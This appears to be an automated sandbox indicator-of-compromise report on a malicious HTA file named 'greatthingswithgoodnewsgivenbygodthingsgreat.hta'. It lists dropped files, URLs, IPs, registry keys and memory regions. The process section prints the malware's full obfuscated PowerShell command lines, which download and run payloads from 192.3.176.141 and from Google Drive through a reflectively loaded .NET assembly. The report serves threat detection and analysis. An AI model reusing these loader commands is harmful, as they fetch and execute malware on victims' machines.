IOC Report
greatthingswithgoodnewsgivenbygodthingsgreat.hta

loading gif

Files

File Path
Type
Category
Malicious
greatthingswithgoodnewsgivenbygodthingsgreat.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\simplethingswithgreatthignsgivenmebestthings[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES81A3.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Oct 25 10:21:36 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4drbfsvf.eww.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eblcmdu.t2y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5etwge5j.3ab.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duj2vkaf.h1j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwj4ygb0.h5t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jl02j2ms.nmr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmlvnje5.bjd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lpjwyfin.25i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psrh2wmp.pl5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgq4zcxl.g3x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\mkzphods\CSC792C8B6B522A465FA7FF7F31B8A0A9.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\greatthingswithgoodnewsgivenbygodthingsgreat.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkzphods\mkzphods.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES81A3.tmp" "c:\Users\user\AppData\Local\Temp\mkzphods\CSC792C8B6B522A465FA7FF7F31B8A0A9.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
192.3.176.141
malicious
http://192.3.176.141/41/simpleth
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://crl.micro
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
http://www.microsoft.co3
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFl
unknown
http://schemas.dmtf.or
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.78

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
142.250.185.78
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5F2B000
heap
page read and write
6BEE000
trusted library allocation
page read and write
617C000
trusted library allocation
page read and write
47CE000
stack
page read and write
617A000
trusted library allocation
page read and write
6FC3000
heap
page read and write
29D0000
heap
page read and write
3568000
heap
page read and write
2A30000
trusted library allocation
page read and write
70DE000
stack
page read and write
6842000
heap
page read and write
685B000
heap
page read and write
3540000
heap
page read and write
735C000
heap
page read and write
3488000
heap
page read and write
6C10000
trusted library allocation
page read and write
700D000
heap
page read and write
7690000
trusted library allocation
page read and write
8B3D000
heap
page read and write
67CD000
heap
page read and write
4CD7000
heap
page read and write
2A70000
heap
page read and write
354C000
heap
page read and write
75CE000
stack
page read and write
6181000
trusted library allocation
page read and write
6A0000
heap
page read and write
7357000
heap
page read and write
681B000
heap
page read and write
3278000
stack
page read and write
6BEE000
trusted library allocation
page read and write
6826000
heap
page read and write
3554000
heap
page read and write
FEC000
stack
page read and write
5FC2000
heap
page read and write
353B000
heap
page read and write
6ABA000
stack
page read and write
69CE000
stack
page read and write
5FCC000
heap
page read and write
617E000
trusted library allocation
page read and write
2F51000
heap
page read and write
760000
heap
page read and write
6E0E000
stack
page read and write
2CB6000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
7CE0000
trusted library allocation
page read and write
2908000
heap
page read and write
55BF000
stack
page read and write
446E000
stack
page read and write
4CE1000
trusted library allocation
page read and write
2D93000
trusted library allocation
page execute and read and write
8C92000
trusted library allocation
page read and write
684B000
heap
page read and write
3580000
trusted library allocation
page read and write
2A14000
heap
page read and write
716E000
stack
page read and write
6826000
heap
page read and write
684B000
heap
page read and write
6176000
trusted library allocation
page read and write
7D4000
heap
page read and write
6817000
heap
page read and write
6863000
heap
page read and write
2A12000
heap
page read and write
6185000
trusted library allocation
page read and write
682F000
heap
page read and write
474E000
stack
page read and write
5CE1000
trusted library allocation
page read and write
67C1000
heap
page read and write
4CE0000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
5C3E000
stack
page read and write
7090000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
6826000
heap
page read and write
617C000
trusted library allocation
page read and write
666F000
heap
page read and write
2AA8000
stack
page read and write
60D6000
heap
page read and write
2983000
trusted library allocation
page execute and read and write
63A9000
heap
page read and write
6181000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
6677000
heap
page read and write
5ED8000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6185000
trusted library allocation
page read and write
60E4000
heap
page read and write
80EE000
stack
page read and write
60E1000
heap
page read and write
6C0E000
trusted library allocation
page read and write
57DC000
heap
page read and write
6560000
heap
page read and write
681F000
heap
page read and write
34DF000
heap
page read and write
6178000
trusted library allocation
page read and write
6069000
heap
page read and write
2A80000
trusted library allocation
page read and write
2963000
heap
page read and write
6F80000
heap
page read and write
7B9C000
heap
page read and write
63A0000
trusted library allocation
page execute
684B000
heap
page read and write
6BEE000
trusted library allocation
page read and write
60D7000
heap
page read and write
6834000
heap
page read and write
C6F000
stack
page read and write
6A7E000
stack
page read and write
5D7F000
stack
page read and write
5F2C000
heap
page read and write
7BD6000
heap
page read and write
2A17000
heap
page read and write
1150000
heap
page read and write
3D8000
stack
page read and write
57B8000
heap
page read and write
4D18000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
4FD0000
heap
page read and write
7E66000
heap
page read and write
353D000
heap
page read and write
680F000
heap
page read and write
684B000
heap
page read and write
2A65000
heap
page read and write
67FD000
heap
page read and write
57E4000
heap
page read and write
356E000
heap
page read and write
34DF000
heap
page read and write
2ABB000
heap
page read and write
6166000
heap
page read and write
4DEE000
trusted library allocation
page read and write
4370000
trusted library allocation
page execute and read and write
4CF4000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6A30000
heap
page read and write
67F8000
heap
page read and write
ED0000
heap
page read and write
682B000
heap
page read and write
6187000
trusted library allocation
page read and write
2CC0000
heap
page read and write
7210000
trusted library allocation
page read and write
6842000
heap
page read and write
60D6000
heap
page read and write
7C70000
trusted library allocation
page execute and read and write
75FB000
stack
page read and write
6DAE000
stack
page read and write
2A5E000
stack
page read and write
54A0000
heap
page execute and read and write
5848000
heap
page read and write
6185000
trusted library allocation
page read and write
60E9000
heap
page read and write
6671000
heap
page read and write
7E63000
heap
page read and write
2A4C000
heap
page read and write
6846000
heap
page read and write
7E50000
heap
page read and write
436C000
stack
page read and write
57D0000
heap
page read and write
6E50000
heap
page read and write
6842000
heap
page read and write
6069000
heap
page read and write
1FE000
stack
page read and write
5FA000
stack
page read and write
6C19000
trusted library allocation
page read and write
2970000
heap
page read and write
7AE000
heap
page read and write
60C9000
heap
page read and write
6520000
heap
page read and write
7E8000
heap
page read and write
6070000
heap
page read and write
72DC000
heap
page read and write
2C94000
heap
page read and write
7B30000
direct allocation
page read and write
6AE0000
trusted library allocation
page read and write
681B000
heap
page read and write
6638000
heap
page read and write
617A000
trusted library allocation
page read and write
3548000
heap
page read and write
2A53000
heap
page read and write
2AC3000
heap
page read and write
7B3E000
direct allocation
page read and write
6834000
heap
page read and write
7800000
heap
page read and write
7A2E000
stack
page read and write
680F000
heap
page read and write
49A0000
heap
page read and write
6A40000
trusted library allocation
page execute and read and write
4CDB000
heap
page read and write
81D0000
trusted library allocation
page read and write
72FB000
heap
page read and write
4CF3000
heap
page read and write
6842000
heap
page read and write
2C3E000
stack
page read and write
617C000
trusted library allocation
page read and write
58B0000
heap
page read and write
7EE0000
trusted library allocation
page read and write
4CD2000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
4D48000
trusted library allocation
page read and write
60E1000
heap
page read and write
6C0E000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
77BE000
stack
page read and write
57B4000
heap
page read and write
7290000
heap
page execute and read and write
2A15000
heap
page read and write
6490000
trusted library allocation
page read and write
480E000
stack
page read and write
750000
heap
page read and write
4C51000
heap
page read and write
6F2C000
heap
page read and write
5889000
trusted library allocation
page read and write
6836000
heap
page read and write
7C64000
heap
page read and write
7A4000
heap
page read and write
67F4000
heap
page read and write
4420000
heap
page execute and read and write
617E000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
6BEE000
trusted library allocation
page read and write
6817000
heap
page read and write
2DC2000
trusted library allocation
page read and write
685B000
heap
page read and write
68BE000
stack
page read and write
35C0000
heap
page read and write
60E5000
heap
page read and write
4CC9000
trusted library allocation
page read and write
44AF000
stack
page read and write
6749000
heap
page read and write
5FCC000
heap
page read and write
2A62000
trusted library allocation
page read and write
34A6000
heap
page read and write
5100000
heap
page read and write
67C9000
heap
page read and write
7A1000
heap
page read and write
2A4E000
heap
page read and write
6BEE000
trusted library allocation
page read and write
7660000
trusted library allocation
page execute and read and write
7BEE000
heap
page read and write
7C10000
heap
page read and write
7250000
trusted library allocation
page read and write
2CBE000
stack
page read and write
6BC0000
heap
page read and write
7B3E000
direct allocation
page read and write
6A40000
heap
page read and write
6822000
heap
page read and write
2A3F000
heap
page read and write
4CF2000
trusted library allocation
page read and write
7220000
trusted library allocation
page read and write
60E6000
heap
page read and write
857C000
stack
page read and write
7CE0000
heap
page read and write
5808000
heap
page read and write
2A65000
heap
page read and write
7810000
heap
page read and write
3480000
heap
page read and write
2DC5000
trusted library allocation
page execute and read and write
ECE000
stack
page read and write
2A49000
trusted library allocation
page read and write
6962000
heap
page read and write
34D1000
heap
page read and write
6719000
heap
page read and write
2A65000
heap
page read and write
56AE000
stack
page read and write
4F9D000
stack
page read and write
682F000
heap
page read and write
72C0000
trusted library allocation
page read and write
6831000
heap
page read and write
4D27000
trusted library allocation
page read and write
8B36000
heap
page read and write
6BEE000
trusted library allocation
page read and write
5850000
heap
page read and write
57FD000
heap
page read and write
8A0E000
stack
page read and write
6BEE000
trusted library allocation
page read and write
432C000
stack
page read and write
4CF2000
heap
page read and write
7CF000
heap
page read and write
3551000
heap
page read and write
50D0000
heap
page read and write
617E000
trusted library allocation
page read and write
35B0000
heap
page readonly
125F000
stack
page read and write
50AB000
stack
page read and write
72A0000
trusted library allocation
page read and write
5808000
heap
page read and write
682D000
heap
page read and write
7A82000
heap
page read and write
5FCA000
heap
page read and write
6834000
heap
page read and write
33C0000
heap
page read and write
6627000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
2A6C000
heap
page read and write
7EAF000
heap
page read and write
6863000
heap
page read and write
609E000
heap
page read and write
721D000
stack
page read and write
71BE000
stack
page read and write
7DA0000
trusted library allocation
page execute and read and write
7C56000
heap
page read and write
72E0000
trusted library allocation
page read and write
3555000
heap
page read and write
49D8000
trusted library allocation
page read and write
7BCA000
heap
page read and write
89AE000
stack
page read and write
6083000
heap
page read and write
7E70000
trusted library allocation
page read and write
5D47000
trusted library allocation
page read and write
57F5000
heap
page read and write
2A14000
heap
page read and write
6834000
heap
page read and write
622F000
trusted library allocation
page read and write
6672000
heap
page read and write
7D30000
trusted library allocation
page read and write
D02000
direct allocation
page read and write
2AD8000
heap
page read and write
3CC000
stack
page read and write
6C0E000
trusted library allocation
page read and write
7D30000
heap
page execute and read and write
39C000
stack
page read and write
2B20000
heap
page read and write
717E000
stack
page read and write
7110000
heap
page execute and read and write
734B000
heap
page read and write
35C8000
heap
page read and write
5B3D000
stack
page read and write
6D0000
heap
page read and write
2A4A000
heap
page read and write
6083000
heap
page read and write
584B000
heap
page read and write
7350000
heap
page read and write
2E40000
heap
page readonly
6EB0000
heap
page read and write
7B70000
heap
page read and write
607F000
heap
page read and write
3558000
heap
page read and write
6182000
trusted library allocation
page read and write
6834000
heap
page read and write
6181000
trusted library allocation
page read and write
6822000
heap
page read and write
778000
heap
page read and write
3569000
trusted library allocation
page read and write
5F80000
heap
page read and write
67FD000
heap
page read and write
293E000
stack
page read and write
60D6000
heap
page read and write
34B0000
heap
page read and write
4AE5000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
3558000
heap
page read and write
67C1000
heap
page read and write
28FE000
stack
page read and write
7290000
trusted library allocation
page read and write
6862000
heap
page read and write
7A6E000
stack
page read and write
7CCA000
trusted library allocation
page read and write
66BB000
heap
page read and write
67C1000
heap
page read and write
2952000
heap
page read and write
4B80000
heap
page read and write
6BCA000
stack
page read and write
78D000
heap
page read and write
6834000
heap
page read and write
6E2E000
stack
page read and write
5FCA000
heap
page read and write
57B5000
heap
page read and write
6836000
heap
page read and write
4DA7000
trusted library allocation
page read and write
CF2000
direct allocation
page read and write
6744000
heap
page read and write
356A000
heap
page read and write
55E7000
trusted library allocation
page read and write
6831000
heap
page read and write
57B0000
heap
page read and write
6BEE000
trusted library allocation
page read and write
6846000
heap
page read and write
353B000
heap
page read and write
6C0E000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
6EFA000
stack
page read and write
6BEE000
trusted library allocation
page read and write
43A0000
heap
page read and write
7250000
trusted library allocation
page read and write
67C9000
heap
page read and write
6842000
heap
page read and write
2AC3000
heap
page read and write
67C1000
heap
page read and write
7E6F000
heap
page read and write
3504000
heap
page read and write
6C0E000
trusted library allocation
page read and write
6166000
heap
page read and write
4F58000
trusted library allocation
page read and write
6834000
heap
page read and write
72A0000
trusted library allocation
page read and write
4AFC000
trusted library allocation
page read and write
3554000
trusted library allocation
page read and write
6817000
heap
page read and write
34BE000
stack
page read and write
60D6000
heap
page read and write
7E2E000
stack
page read and write
29B0000
trusted library allocation
page read and write
681B000
heap
page read and write
60E7000
heap
page read and write
2C7F000
stack
page read and write
7C53000
heap
page read and write
6E81000
heap
page read and write
2990000
trusted library allocation
page read and write
4C91000
heap
page read and write
6A40000
trusted library allocation
page read and write
557D000
stack
page read and write
76FA000
stack
page read and write
728C000
trusted library allocation
page read and write
6B0E000
stack
page read and write
70E0000
trusted library allocation
page read and write
281E000
stack
page read and write
505F000
stack
page read and write
2AB9000
heap
page read and write
681B000
heap
page read and write
4D48000
heap
page read and write
44EE000
stack
page read and write
6C0E000
trusted library allocation
page read and write
460000
heap
page read and write
5ED6000
heap
page read and write
50CE000
trusted library allocation
page read and write
700000
heap
page read and write
7220000
trusted library allocation
page read and write
3568000
heap
page read and write
43C0000
heap
page read and write
2A37000
heap
page read and write
7240000
trusted library allocation
page read and write
6B30000
trusted library allocation
page read and write
681B000
heap
page read and write
8900000
trusted library allocation
page read and write
72D0000
heap
page read and write
2D9D000
trusted library allocation
page execute and read and write
6A35000
heap
page execute and read and write
2980000
trusted library allocation
page read and write
6822000
heap
page read and write
8AF8000
heap
page read and write
3555000
heap
page read and write
76E0000
trusted library allocation
page read and write
65B4000
heap
page read and write
6EBE000
stack
page read and write
6842000
heap
page read and write
3553000
trusted library allocation
page execute and read and write
3541000
heap
page read and write
E80000
heap
page read and write
611F000
stack
page read and write
5848000
heap
page read and write
67C9000
heap
page read and write
8120000
trusted library allocation
page execute and read and write
4FF4000
trusted library allocation
page read and write
2AC3000
heap
page read and write
6166000
heap
page read and write
7E51000
heap
page read and write
